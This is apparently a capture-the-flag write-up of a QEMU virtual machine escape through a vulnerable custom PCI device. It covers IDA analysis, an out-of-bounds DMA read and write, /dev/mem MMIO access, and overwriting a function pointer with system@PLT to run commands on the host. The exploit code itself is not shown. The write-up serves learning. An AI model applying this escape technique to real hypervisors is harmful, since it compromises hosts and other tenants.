Before we start I just want to say that I did not play this ctf and probably wouldn’t have been able to complete this challenge in time even if I did. Me and a couple teammates did this, SCSI and q-escape as exercise and I wanted to document the methods and analysis.
The challenge incorporates a vulnerable PCI Device which uses DMA and Memory I/O. There is an out-of-bounds bug in one of the DMA handlers allowing us to read and write past the dma_buf buffer on the host.
From the command line arguments to start the challenge we see there’s a custom device -device hitb, luckily for us qemu-system-x86_64 is compiled with debugging symbols. If we search for “hitb” in IDA -> View -> Open Subviews -> Local Types we can see the HitbState definition used to manage the hitb device state.
Next, if we head over to the Functions subview in IDA and search for “hitb_” we will find all of the associated functions with the “hitb” device. Initialization starts with xxx_class_init so let’s start from there.
Initially IDA recognizes pdev as ObjectClass (which if this was C++ it would have been the base class), however if we change its type to PCIDeviceClass which it should be after the cast, we will see the properties this PCI device is being registered with and 2 callbacks. Uninit is irrelevant to us as it just cleans up after the device has been unloaded. Moving on to the second callback pci_hitb_realize, this is where the memory for the MMIO is allocated, mmio ops and the thread that performs the DMA.
Moving on to mmio ops we have hitb_mmio_read which can get us any relevant HitbState properties. hitb_mmio_write changes the state of the device and sends commands to the DMA thread. I will condense the functionality of it to the relevant commands.
When analyzing Hitb handlers such as the mmio ops, realize and the DMA thread don’t forget to change the declaration of the handler’s arguments from void* opaque to HitbState* hitb
Finally we just need to analyze the hitb_dma_timer to understand how memory transfer via DMA is handled.
The only thing left to figure out is where the mmio is actually mapped. For that we need to first identify the PCI Device in the system with lspci
To interact with the mmio, we have 2 options (that I know of). Using the sysfs by mmap-ing the resource0 file like pcimem does or we could use the /dev/mem device which represents the physical memory of the system. Since I’ve done it before with pcimem, this time I will use /dev/mem. /dev/mem addresses are interpreted as physical memory to access the mmio we need to open and mmap /dev/mem at offset 0xfea00000 and size 0x100000.
cpu_physical_memory_rw(hwaddr addr, uint8_t *buf, int len, int is_write) provides us with arbitrary read and write. Whenever the is_write parameter is set the function will write into the physical address (PA) addr from source virtual address (VA) buf. Whenever is_write is unset the functionality will be reversed and buf VA will be the destination with the PA addr as source. With no boundary checks of VA buf in hitb_dma_timer let’s see what we can access.
Thanks to the symbols we can see that the hitb_enc function pointer is right after the dma_buf, our goal is to leak that pointer and overwrite it with the address of system@PLT this way we can call system on the host with our controlled arguments from the guest.
To resolve VA to PA from user-land we can use /proc/self/pagemap with the following function.
If we have to imagine a scenario where we have to deliver our exploit to the server and there’s no compiler there, we would have to transfer a statically compiled version of our exploit. To reduce the size to a minimum we can use musl-gcc, optimize for size, and strip the symbols. We can reduce the size even further if we change the libc API to direct syscalls (per vakzz’s suggestion).
To deliver the exploit locally we only need to append the file to the file system (the cpio archive).